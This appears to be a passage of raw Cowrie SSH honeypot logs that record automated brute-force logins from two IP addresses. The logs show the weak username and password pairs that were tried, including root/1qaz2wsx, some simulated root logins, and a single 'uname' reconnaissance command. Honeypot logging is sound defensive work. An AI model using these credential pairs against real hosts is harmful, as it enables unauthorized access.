{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:40:38.812112Z","src_ip":"212.227.125.160","session":"49ed7253ac6e"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2wsx","message":"login attempt [root/1qaz2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:40:39.696005Z","src_ip":"212.227.125.160","session":"49ed7253ac6e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:40:40.219055Z","src_ip":"212.227.125.160","session":"49ed7253ac6e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:40:40.219729Z","src_ip":"212.227.125.160","session":"49ed7253ac6e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:40:40.439878Z","src_ip":"212.227.125.160","session":"49ed7253ac6e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:40:40.441492Z","src_ip":"212.227.125.160","session":"49ed7253ac6e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35256,"dst_ip":"1.2.3.4","dst_port":22,"session":"76ba3162a6f8","protocol":"ssh","message":"New connection: 212.227.235.229:35256 (1.2.3.4:22) [session: 76ba3162a6f8]","sensor":"my-vps","timestamp":"2025-08-28T06:40:45.347843Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:40:45.348920Z","src_ip":"212.227.235.229","session":"76ba3162a6f8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:40:45.617009Z","src_ip":"212.227.235.229","session":"76ba3162a6f8"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz2wsx","message":"login attempt [root/1qaz2wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:40:46.449982Z","src_ip":"212.227.235.229","session":"76ba3162a6f8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:40:47.092920Z","src_ip":"212.227.235.229","session":"76ba3162a6f8"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:40:47.093682Z","src_ip":"212.227.235.229","session":"76ba3162a6f8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:40:47.368170Z","src_ip":"212.227.235.229","session":"76ba3162a6f8"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:40:47.369369Z","src_ip":"212.227.235.229","session":"76ba3162a6f8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55988,"dst_ip":"1.2.3.4","dst_port":22,"session":"406d08822d5c","protocol":"ssh","message":"New connection: 212.227.235.229:55988 (1.2.3.4:22) [session: 406d08822d5c]","sensor":"my-vps","timestamp":"2025-08-28T06:40:47.513227Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:40:47.514066Z","src_ip":"212.227.235.229","session":"406d08822d5c"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T06:40:48.113032Z","src_ip":"212.227.235.229","session":"406d08822d5c"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:40:49.228342Z","src_ip":"212.227.235.229","session":"406d08822d5c"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:40:49.489808Z","src_ip":"212.227.235.229","session":"406d08822d5c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56482,"dst_ip":"1.2.3.4","dst_port":22,"session":"0fa54fdfcbeb","protocol":"ssh","message":"New connection: 212.227.125.160:56482 (1.2.3.4:22) [session: 0fa54fdfcbeb]","sensor":"my-vps","timestamp":"2025-08-28T06:40:55.119103Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:40:55.142986Z","src_ip":"212.227.125.160","session":"0fa54fdfcbeb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:40:55.358973Z","src_ip":"212.227.125.160","session":"0fa54fdfcbeb"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp123","message":"login attempt [uftp/uftp123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:40:56.214894Z","src_ip":"212.227.125.160","session":"0fa54fdfcbeb"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:40:57.436075Z","src_ip":"212.227.125.160","session":"0fa54fdfcbeb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46958,"dst_ip":"1.2.3.4","dst_port":22,"session":"54f34c49b83f","protocol":"ssh","message":"New connection: 212.227.235.229:46958 (1.2.3.4:22) [session: 54f34c49b83f]","sensor":"my-vps","timestamp":"2025-08-28T06:41:01.741164Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:41:01.741839Z","src_ip":"212.227.235.229","session":"54f34c49b83f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:41:01.995332Z","src_ip":"212.227.235.229","session":"54f34c49b83f"}
{"eventid":"cowrie.login.failed","username":"uftp","password":"uftp123","message":"login attempt [uftp/uftp123] failed","sensor":"my-vps","timestamp":"2025-08-28T06:41:02.757648Z","src_ip":"212.227.235.229","session":"54f34c49b83f"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:41:04.013114Z","src_ip":"212.227.235.229","session":"54f34c49b83f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58556,"dst_ip":"1.2.3.4","dst_port":22,"session":"189d45425232","protocol":"ssh","message":"New connection: 212.227.125.160:58556 (1.2.3.4:22) [session: 189d45425232]","sensor":"my-vps","timestamp":"2025-08-28T06:41:11.638752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:41:11.648979Z","src_ip":"212.227.125.160","session":"189d45425232"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:41:11.867492Z","src_ip":"212.227.125.160","session":"189d45425232"}
{"eventid":"cowrie.login.failed","username":"data","password":"data","message":"login attempt [data/data] failed","sensor":"my-vps","timestamp":"2025-08-28T06:41:12.762030Z","src_ip":"212.227.125.160","session":"189d45425232"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:41:13.987691Z","src_ip":"212.227.125.160","session":"189d45425232"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39848,"dst_ip":"1.2.3.4","dst_port":22,"session":"8868d18a6a20","protocol":"ssh","message":"New connection: 212.227.235.229:39848 (1.2.3.4:22) [session: 8868d18a6a20]","sensor":"my-vps","timestamp":"2025-08-28T06:41:18.273947Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:41:18.274688Z","src_ip":"212.227.235.229","session":"8868d18a6a20"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:41:18.523208Z","src_ip":"212.227.235.229","session":"8868d18a6a20"}
{"eventid":"cowrie.login.failed","username":"data","password":"data","message":"login attempt [data/data] failed","sensor":"my-vps","timestamp":"2025-08-28T06:41:19.270252Z","src_ip":"212.227.235.229","session":"8868d18a6a20"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:41:20.521408Z","src_ip":"212.227.235.229","session":"8868d18a6a20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46412,"dst_ip":"1.2.3.4","dst_port":22,"session":"26a479f55eed","protocol":"ssh","message":"New connection: 212.227.125.160:46412 (1.2.3.4:22) [session: 26a479f55eed]","sensor":"my-vps","timestamp":"2025-08-28T06:41:28.075189Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:41:28.076146Z","src_ip":"212.227.125.160","session":"26a479f55eed"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:41:28.291449Z","src_ip":"212.227.125.160","session":"26a479f55eed"}
{"eventid":"cowrie.login.failed","username":"bigdata","password":"bigdata","message":"login attempt [bigdata/bigdata] failed","sensor":"my-vps","timestamp":"2025-08-28T06:41:28.947504Z","src_ip":"212.227.125.160","session":"26a479f55eed"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:41:30.165301Z","src_ip":"212.227.125.160","session":"26a479f55eed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35524,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5a1ee34d2d5","protocol":"ssh","message":"New connection: 212.227.235.229:35524 (1.2.3.4:22) [session: e5a1ee34d2d5]","sensor":"my-vps","timestamp":"2025-08-28T06:41:34.699204Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:41:34.699830Z","src_ip":"212.227.235.229","session":"e5a1ee34d2d5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:41:34.951290Z","src_ip":"212.227.235.229","session":"e5a1ee34d2d5"}
{"eventid":"cowrie.login.failed","username":"bigdata","password":"bigdata","message":"login attempt [bigdata/bigdata] failed","sensor":"my-vps","timestamp":"2025-08-28T06:41:35.705104Z","src_ip":"212.227.235.229","session":"e5a1ee34d2d5"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:41:36.958442Z","src_ip":"212.227.235.229","session":"e5a1ee34d2d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51652,"dst_ip":"1.2.3.4","dst_port":22,"session":"819fee318e4e","protocol":"ssh","message":"New connection: 212.227.125.160:51652 (1.2.3.4:22) [session: 819fee318e4e]","sensor":"my-vps","timestamp":"2025-08-28T06:41:44.494411Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:41:44.497199Z","src_ip":"212.227.125.160","session":"819fee318e4e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sh